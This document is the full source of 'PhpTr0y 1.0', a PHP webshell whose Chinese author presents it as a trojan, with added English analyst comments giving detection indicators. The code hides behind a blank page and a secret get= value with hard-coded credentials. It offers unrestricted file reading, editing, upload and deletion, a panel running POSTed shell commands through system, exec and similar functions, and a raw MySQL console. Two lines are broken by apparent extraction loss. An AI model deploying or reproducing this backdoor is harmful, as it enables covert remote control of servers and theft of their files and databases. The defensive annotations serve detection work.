 PhpTr0y1.0
一个运行在服务端的php文件管理程序,也可以当木马用.借鉴了phpspy一些功能.
抛弃了传统的认证方式,改用先获取get值再登陆界面的方式.
如果你运行发现页面空白表示正常,这样隐蔽性会有很大提高.
默认get值为www.chinahacker.info.默认帐户skyfox.默认密码password9.
除了打包类没做以外其它的功能也差不多全了,自己没有时间做了,
其它事也很忙,可能有些bug,如果有的话告诉我,近期没什么时间改.
这个可能是第一个用xhtml输出的php中文木马了.呵呵.
为了尽量让文件小点,我去掉了注释.文件大小大约15K.
如果你需要把文件当作木马用的话,请注意修改文件名称比如.
config.php
conn.php
global.php
如有其它相关问题请联系我QQ53423398.

<?
/*----------------------------------------------------
Php T-r-0*y 1.0 by 天Fox.
ZiBo ShanDong China.
QQ:53423398.
Email:ooofox@msn.com
---------------------------------------------------*/
// Analyst note: level 7 = E_ERROR | E_WARNING | E_PARSE, so notices about the many
// undefined variables read below are never displayed.
error_reporting(7);

// Hard-coded operator account and password, compared as plain text by the login
// checks further down. These literals are stable static indicators when sweeping
// a web root for this sample.
$tr0yname="skyfox";
$tr0ypass="password9";
// "1" selects the session-based login branch below; any other value selects the
// cookie-based branch.
$checkmode['soc']="1";

// Emulates register_globals when the ini setting is off: every key of the request,
// server, upload, environment and cookie arrays becomes a global variable.
// extract() overwrites existing variables by default, so names assigned above are
// not protected from same-named request keys, and every bare variable read later
// in the file ($down, $dirs, $delfile, $sql, ...) is request-controlled input.
if ( !ini_get('register_globals') )
{
extract($_POST);
extract($_GET);
extract($_SERVER);
extract($_FILES);
extract($_ENV);
extract($_COOKIE);
// session_start() is only called further down, so $_SESSION is presumably unset
// here unless sessions auto-start - confirm against the host's php.ini.
if ( isset($_SESSION) )
{
extract($_SESSION);
}
}
// Access gate. Session-based branch: the one selected by the shipped configuration.
if ($checkmode['soc']=="1"){
session_start();

// ?get=logout destroys the session and prints a page that closes itself.
if ($_GET['get'] == "logout") {
session_destroy();
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
  // Loose (==) plain-text comparison of the session values with the hard-coded pair.
  if ($_SESSION['admin']==$tr0yname && $_SESSION['pass']==$tr0ypass){
  // `&&` binds tighter than `=`, so 'admin' is assigned the boolean result and
  // 'pass' the password; the loose comparison above still matches on later requests.
  $_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;}else{
  // POSTed name/pass fields are compared in plain text; this block contains no
  // hashing, rate limiting or lockout.
  if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
  {
  $_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;
  }else{
  // login() always ends the request, so nothing below runs without a valid session.
  login();
  }
}
}
else
{
// Cookie-based branch; not reached while $checkmode['soc'] is "1".

if ($_GET['get']=="logout"){
setcookie ("admin", "");
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
  // The condition tests the return value of setcookie() (whether the header could
  // be queued), not a cookie presented by the client, and the value written to the
  // cookie is the plain-text password.
  // NOTE(review): as written, the credential check in the else arm only runs when
  // setcookie() fails - confirm before relying on this branch during triage.
  if (setcookie ("admin",$tr0ypass,time()+(1*24*3600))){
  setcookie ("admin",$tr0ypass,time()+(1*24*3600));}else{
  if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
  {
  setcookie ("admin",$tr0ypass,time()+(1*24*3600));
  }else{
  login();
  }
}
}
// File download handler. $down is filled from the request by the extract() calls
// earlier in the file and reaches file_exists()/filesize()/readfile() with no path
// restriction, so any file readable by the web-server account can be streamed out.
// For triage: look for requests carrying a `down` parameter in the access logs.
if(!empty($down)) {
  if (!@file_exists($down)) {
  echo "<script>alert('你要下的文件不存在!')</script>";
  } else {
  // Only the base name is used for the headers; the extension is taken as the text
  // after the last dot and appended to "application/x-".
  $filename = basename($down);
  $filename_info = explode('.', $filename);
  $fileext = $filename_info[count($filename_info)-1];
  header('Content-type: application/x-'.$fileext);
  header('Content-Disposition: attachment; filename='.$filename);
  header('Content-Description: PHP Generated Data');
  header('Content-Length: '.filesize($down));
  // Errors are suppressed with @, so a failed read produces an empty body.
  @readfile($down);
  exit;
  }
}


// Directory of this script with backslashes normalised to forward slashes.
$tr0ypath=str_replace('\\','/',dirname(__FILE__));
// Working directory for the file manager: "." by default, otherwise the raw
// `dirs` query parameter. getPath() only builds the path string shown in the page
// header; the file operations below use $dirs itself.
if (!isset($dirs) or empty($dirs)) {
  $dirs = ".";
  $nowpath = getPath($tr0ypath, $dirs);
} else {
  $dirs=$_GET['dirs'];
  $nowpath = getPath($tr0ypath, $dirs);
}
// Undo magic-quotes escaping on $_GET/$_POST. This runs after the extract() calls,
// so globals already extracted from the request are not touched by it.
// get_magic_quotes_gpc() was removed in PHP 8, which dates the sample to older runtimes.
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}

?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="zh-CN"/>
<head>
<title>PhpTr0y bY 天Fox <? echo "当前系统: ".PHP_OS.""?></title>
<meta http-equiv=Content-Language content="text/html; charset=gb2312" />
<style type="text/css">
body{margin:0px;PADDING:0px;font-family:"Tahoma", Verdana, Lucida, Arial, Helvetica, 宋体,sans-serif;color:#FFF;font-size:12px;background:#677D92 left top;}
#title{margin:0px;padding:0px 0px 0px 0px;background:#8C0700;width:606px;LINE-HEIGHT:18px;}
#body{margin:0px;padding:0px 0px 0px 0px;width:600px;color:#FFF;background:#556B80;LINE-HEIGHT:150%;text-align:left;border:#768CA3 3px solid;}
#action{width:601px;color:#FFF;padding:0px 0px 0px 5px;background:#8C0700;text-align:left;}
a:link{font-weight:normal;text-decoration:none;color:#FFF;}
a:visited {font-weight:normal;text-decoration:none;color:#FFF;}
a:hover {font-weight:normal;text-decoration:none;color:#FFF;}
a:active {font-weight:normal;text-decoration:none;color:#FFF;}
form{margin:0}
select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double}
input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
</style>
<script language=Javascript>
// Copies the state of the form's `selectall` checkbox to every other element of
// the form. The unbraced `if` governs only the assignment on the following line.
function CheckAll(form)
{
  for (var i=0;i<form.elements.length;i++)
  {
    var e = form.elements[i];
    if (e.name != 'selectall')
    e.checked = form.selectall.checked;
}
}
</script>
</head>
<body>
<div align="center">
<div id="title"><a href="http://www.chinahacker.info/" target="new"><b>PhpTr0y1.0</b></a>&nbsp;&nbsp;<a href="<?=$_SERVER['PHP_SELF']?>"><b>返回根目录</b></a>&nbsp;&nbsp;<a href="?get=logout"><b>退出</b></a>&nbsp;&nbsp;<a href="?dir=phpinfo" target="new"><b>Phpinfo()</b></a>&nbsp;&nbsp;<a
href="?dir=shell"><b>Webshell</b></a>&nbsp;&nbsp;<a href="?dir=mysql"><b>Mysql</b></a></div><br />
<div id="body"><div align="left">当前目录位置:<?=$nowpath?>/<br />程序所在位置:<?=$tr0ypath?>/<br />
  <form action="" method="get">跳转到指定目录:<input name="dirs" type="text" /><input type="submit" name="dirs" value="确定" /></form>
  <form action="" method="post" enctype="multipart/form-data">上传文件到当前位置:<input name="uploadfiles" type="file" /><input

type="submit" name="uploadfile" value="确定"><input type="hidden" name="uploaddir" value="<?=$dirs?>" /></form>
  <form action="" method="post">在当前目录建立文件夹:<input name="newdir" type="text" value=""><input type="submit" name="createdir" value="确定"></form>
  <form action="" method="post">在当前目录新建文件:<input name="newfile" type="text" value=""><input type="submit" name="createfile" value="确定"></form></div></div><br /><?
// File-manager action dispatcher. Every flag and path tested in this chain
// ($entereditfile, $createdir, $chmod, $rename, $delfile, $deldir, $uploadfile and
// their arguments) is a request value turned into a global by extract(). None of
// the paths is validated or confined to a base directory, so each action operates
// with the full filesystem rights of the web-server account.
if($entereditfile) {
  // Write: overwrites (mode "w") the file named by `editfilename` with the POSTed
  // `content` field.
  $filename="$editfilename";
  @$fp=fopen("$filename","w");
  echo $msg=@fwrite($fp,$_POST['content']) ? "写入文件成功" : "写入失败";
  @fclose($fp);
}
elseif ($createdir){
  // Create directory: the requested mode is 0777 (world-writable before umask).
  $newdirectory=$_POST['newdir'];
  if (@mkdir($newdirectory, 0777)){
  echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
  echo "建立目录成功请点击这里返回.如果没有发现目录请刷新页面.";
  }else{
  echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
  echo "建立目录没有成功,可能是现在的权限较低造成的或者你要创建的目录已经存在.请配置当前权限.";
  }
  }
elseif ($createfile) {
  // New file: only renders an editor form; the write itself happens through the
  // $entereditfile branch when that form is submitted. $newfile is echoed into the
  // form without HTML escaping.
  $newfile=$_POST['newfile'];
?>
<div id="body">程序名称&内容:<form action="?dir=<?=urlencode($dir)?>" method="post"><input maxLength="100" size="50" name="editfilename"
value="<?=$newfile?>" /><br /><textarea name="content" rows="23" cols="115"></textarea><br /><input type="submit" name="entereditfile"
value="确定新建" /></form></div>
<?
}
elseif($chmod){
  // Change mode: the POSTed octal string is converted to an integer and applied to
  // $dir/$file; the resulting permission bits are echoed back as four octal digits.
  $rechmod=base_convert($_POST['rechmod'],8,10);
  echo $msg=chmod($dir."/".$file,$rechmod) ? "权限修改成功," : "权限修改失败,";
  echo "修改后的属性为:".substr(base_convert(fileperms($dir."/".$file),10,8),-4)."";
}
elseif($rename){
  // Rename within $dirs; both names come straight from the request.
  echo $msg=rename($dirs."/".$renamefile,$dirs."/".$renamefile2) ? "修改文件名成功" : "修改文件名失败";
}
elseif(@$delfile!="") {
  // Delete file: the path is echoed back unescaped on success.
  if(file_exists($delfile)) {
  if (@unlink($delfile)) {
  echo "".$delfile." 删除成功!";
  } else {
  echo "文件删除失败!";
}
  } else {
  echo "文件不存在,删除失败!";
  }
}

elseif($deldir) {
  // Delete directory via rmdir().
  if($deldir!="") {
  if(!file_exists("$deldir")) {
  echo "目录已不存在!";
  } else {
  if (@rmdir($deldir)){
  echo "目录删除成功";
  }else{
  echo "删除失败!";
  }
}
}
}
elseif($uploadfile) {
  // Upload: copies the temporary upload to $uploaddir using the client-supplied
  // file name. There is no extension, type or is_uploaded_file() check, and both
  // the target directory and the name are request-controlled.
  echo $msg=@copy($_FILES['uploadfiles']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfiles']['name']."") ? "上传成功" : "上传失败";
}
// Raw SQL execution: the request-supplied $sql string is sent to the server as-is
// through the legacy mysql_* extension (removed in PHP 7.0). The outcome is only
// stored in $errInfo, which is not printed anywhere in this block.
// NOTE(review): $conn is not assigned anywhere in the visible file (the connect
// call further down stores its handle in $exec) - confirm where it would come from.
if($sql!=""){
$sql = trim(stripslashes($sql));
mysql_query($sql,$conn);
   if(mysql_errno()==0)
   {
   $errInfo = "成功执行指定的SQL指令!";
   }
   else
   {
   $errInfo = mysql_error();
   }
}
// Default view: directory listing of $dirs. The directory is read twice, first to
// print sub-directories and then to print files. Entry names are interpolated into
// the HTML without escaping; link parameters are passed through urlencode().
if (!isset($_GET['dir']) OR empty($_GET['dir']) OR ($_GET['dir'] == "dir")){
$handle=@opendir($dirs);
while ($file = @readdir($handle)) {
$test="$dirs/$file";
$retest=@is_dir($test);
  // Loose comparison of the boolean is_dir() result with "1": true for directories.
  if ($retest=="1"){
  // filesize() is given the bare entry name rather than $test, and the value is
  // labelled "KB" in the output although filesize() reports bytes.
  $filesize=@filesize($file);
    if($file!=".." && $file!="."){
      $ctime=@date("Y-m-d H:i:s",@filectime($test));
       $mtime=@date("Y-m-d H:i:s",@filemtime($test));
      // Last four octal digits of the mode, e.g. "0755".
      $dirperm=@substr(@base_convert(@fileperms($test),10,8),-4);
echo "<div id=\"body\"><a href=\"?dirs=".urlencode($dirs)."/".urlencode($file)."\" title=\"创建时间: $ctime 最后修改时间: $mtime\">目录名称:<b>$file</b></a>&nbsp;
文件大小: $filesize KB &nbsp;&nbsp; 权限属性: $dirperm<br /><a href=\"?dir=".urlencode($dirs)."&deldir=".urlencode($dirs)."/".urlencode($file)."\" target=\"new\">删除</a> <a href=\"?get=newname&newname=$file\" target=\"new\">改名</a> &nbsp;&nbsp;创建时间: $ctime 最后修改时间: $mtime</div>\n <br />";
}else{
// ".." is rendered as a parent-directory link; "." is skipped.
if ($file==".."){
echo"<div id=\"action\"><a href=\"?dirs=".urlencode($dirs)."/".urlencode($file)."\">上级目录</a></div>";
}}}}
echo "<div id=\"title\">目录读取完毕,以下是文件.</div><br />";
@closedir($handle);
echo "<form action=\"\" method=\"post\">";
// Second pass: regular files, each with download / edit / delete / rename links
// that point back at this script with the corresponding query parameters.
$handle=@opendir($dirs);
while ($file = @readdir($handle)) {
$test="$dirs/$file";
$retest=@is_dir($test);
  if ($retest=="0"){
  $filesize=@filesize($file);
  $ctime=@date("Y-m-d H:i:s",@filectime($test));
  $mtime=@date("Y-m-d H:i:s",@filemtime($test));
  $dirperm=@substr(@base_convert(@fileperms($test),10,8),-4);
echo "<div id=\"body\"><a href=\"$test\" target=\"new\" title=\"创建时间: $ctime 最后修改时间: $mtime\">文件名
称:<b> $file</b></a>&nbsp;文件大小: $filesize KB &nbsp;&nbsp; 权限属性: <a href=\"?get=cmhod&dir=".urlencode($dirs)."&file=".urlencode($file)."\" target=\"new\">$dirperm</a><br /><a href=\"?down=".urlencode($test)."\">下载</a> <a href=\"?edit=editfile&dir=".urlencode($dirs)."&editfile=".urlencode($file)."\" target=\"new\">编辑</a> <a href=\"?dir=".urlencode($dirs)."&delfile=".urlencode($dirs)."/".urlencode($file)."\" target=\"new\">删除</a> <a href=\"?dir=rename&dirs=".urlencode($dirs)."&renamefile=".urlencode($file)."\" target=\"new\">改名</a> 创建时间: $ctime 最后修改时间: $mtime</div>\n <br />";
  }else{}
}
@closedir($handle);

}

// ?dir=phpinfo : dumps the full phpinfo() page (configuration, paths, environment).
// NOTE(review): $dis_func is not assigned in the visible file, so the "disabled"
// test presumably never matches - confirm. eregi() was removed in PHP 7.0.
elseif ($_GET['dir'] == "phpinfo") {
  echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
  echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用.";
  exit;
}
// ?dir=rename : renders the rename form. $renamefile and $dirs are written into
// unquoted attribute values without escaping.
elseif ($_GET['dir']=="rename"){
echo "<form action=\"\" method=\"post\"><input name=\"renamefile2\" type=\"text\" value=$renamefile />";
echo "<input type=\"hidden\" name=\"dirs\" value=$dirs />";
echo "<input name=\"renamefile\" type=\"hidden\" value=$renamefile />";
echo "<input type=\"submit\" name=\"rename\" value=\"确定\" /></form>";
}

// ?dir=shell : remote command execution panel. The POSTed `cmd` string is handed
// unmodified to one of five PHP process functions chosen by `execfunc`, and the
// output is printed into a read-only textarea.
// For defenders: POST requests to a script with dir=shell in the query string and
// `cmd` / `execfunc` body fields are strong indicators; listing these functions in
// the disable_functions ini setting makes this panel inert.
elseif ($_GET['dir']=="shell"){
?>
<div id="body">
<form action="" method="post">
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select>
<input type="text" name="cmd" value="<?=$_POST['cmd']?>" />
<input type="submit" value="确定" /><br />
<textarea name="showbank" rows="23" cols="115" readonly="readonly"><?php
  // Dispatch on the selected function name; an unknown or missing value falls
  // through to system() in the final else.
  if (!empty($_POST['cmd'])) {
    if ($execfunc=="system") {
      system($_POST['cmd']);
    } elseif ($execfunc=="passthru") {
      passthru($_POST['cmd']);
    } elseif ($execfunc=="exec") {
      // exec() returns only the last line of output.
      $result = exec($_POST['cmd']);
      echo $result;
    } elseif ($execfunc=="shell_exec") {
      $result=shell_exec($_POST['cmd']);
      echo $result;  
    } elseif ($execfunc=="popen") {
      // A single fread() of at most 2096 bytes; longer output is cut off.
      $pp = popen($_POST['cmd'], 'r');
      $read = fread($pp, 2096);
      echo $read;
      pclose($pp);
    } else {
      system($_POST['cmd']);
    }
  }
  ?></textarea>
</form>
</div>
<?
}

// ?dir=mysql : database client panel. The form defaults to localhost:3306 and the
// root account; host, user, password and database all come from the POST body.
elseif ($_GET['dir']=="mysql") {
?>
<div id="body">
<form action="" method="post">
服务器地址:<input type="text" name="mysqlhost" value="localhost:3306" />
用户名:<input type="text" name="mysqluser" value="root" /><br />
数据库密码:<input type="text" name="mysqlpass" value="" />
数据库:<input type="text" name="mysqldb" value="" />
<input type="submit" name="mysql" value="确定" />
</form>
</div>
<?
// On submit, connect with the legacy mysql_* extension (removed in PHP 7.0) and,
// if that succeeds, show a free-form SQL box. The connection handle is stored in
// $exec; $sql is echoed into the textarea without HTML escaping.
if ($mysql) {
if($exec=mysql_connect($_POST['mysqlhost'],$_POST['mysqluser'],$_POST['mysqlpass']) and mysql_select_db($_POST['mysqldb'])) {
echo "数据库连接成功.";
echo "<div id=\"body\"><form action=\"\" method=\"post\">";
echo "<textarea name=\"sql\" rows=\"32\" cols=\"115\">$sql</textarea><br />";
echo "<input type=\"submit\" value=\"确定\" />你可以在此处执行MySQL命令.";
echo "</form></div>";
}else{
echo "数据库连接失败,请检查输入内容是否正确.";
}
}
}
// ?get=cmhod (spelled this way in the listing links too): renders the permission
// form, pre-filled with the current mode of $dir/$file as four octal digits.
// Submitting it sets the `chmod` flag handled by the action dispatcher earlier in
// the file. $file and $_GET['dir'] are written into the form without HTML escaping.
elseif ($_GET['get']=="cmhod"){
?>
设置权限:<form action="" method="post"><input type="text" name="file" value="<?=$file?>" readonly="readonly" /><br /><input type="text" name="rechmod" value="<?=@substr(@base_convert(@fileperms($dir."/".$file),10,8),-4)?>" /><input name="dir" type="hidden" value="<?=$_GET['dir']?>" /><input type="submit" name="chmod" value="确定" /></form>
<?
}
// ?edit=editfile : file editor view. With no $newfile set, the whole of
// $dir/$editfile is read and HTML-escaped for display in the textarea; otherwise
// an empty editor is opened for the new name. Saving posts back to the
// `entereditfile` write branch of the action dispatcher earlier in the file.
elseif ($_GET['edit']=="editfile"){
if ($newfile==""){
// Both path components are request values; no base-directory restriction applies.
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}

?>
  
  <div id="body">程序名称&内容:<form action="?dir=<?=urlencode($dir)?>" method="post"><input maxLength="100" size="50" name="editfilename"

value="<?=$filename?>" /><br /><textarea name="content" rows="23" cols="115"><?=$contents?></textarea><br /><input type="submit" name="entereditfile"

value="确定编辑" /></form></div>

<?
}

?>
<div id="action">程序制作:天Fox.免责声明:此程序仅用于技术交流,任何违法行为于程序作者无关.<br />Copyright &copy; 2005 Chinahacker.info All Rights Reserved.</div>
</div>
</body>
</html>
<?
//函数库
// Renders the login form and always terminates the request.
// The form is only printed when the `get` query parameter equals the hard-coded
// string below; any other request receives an empty body. For defenders: a PHP
// file that answers with a blank page, and access-log entries carrying this
// `get=` value, are both indicators of this sample.
function login() {
$get="www.chinahacker.info";
if ($_GET['get']==$get) {
?>
<style tpye="text/css">
select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double;}
input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
</style>
<form method="post" action="<?=$_SERVER['PHP_SELF']?>"><input name="name" type="text" id="name" /><br /><input name="pass" type="password" id="pass"

/><br /><input type="submit" value="ok" /></form>
<?
}
else
{
// Deliberately prints nothing.
echo"";
}
// Reached on both paths: the caller never continues past login().
exit;
}
// Strips backslash escaping from the string values of $array, recursing into
// nested arrays, and returns the array (which is also modified through the
// reference parameter). each() was removed in PHP 8.0.
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
// NOTE(review): this condition does not parse as captured on this page; an
// operator between the two key tests appears to have been lost in extraction.
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// Joins $relativepath onto $mainpath segment by segment ('/'-separated) and
// returns the resulting path string: '..' removes the last segment collected so
// far, any other segment is appended. Performs no filesystem access and no
// containment check. $dirs is declared global but not used in the body.
function getPath($mainpath, $relativepath) {
global $dirs;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
// NOTE(review): this line does not parse as captured on this page; an operator
// between the two comparisons appears to have been lost in extraction. The
// visible intent is to skip '.' and empty segments.
if ($relativepath_info[$i] == '.' $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
?>

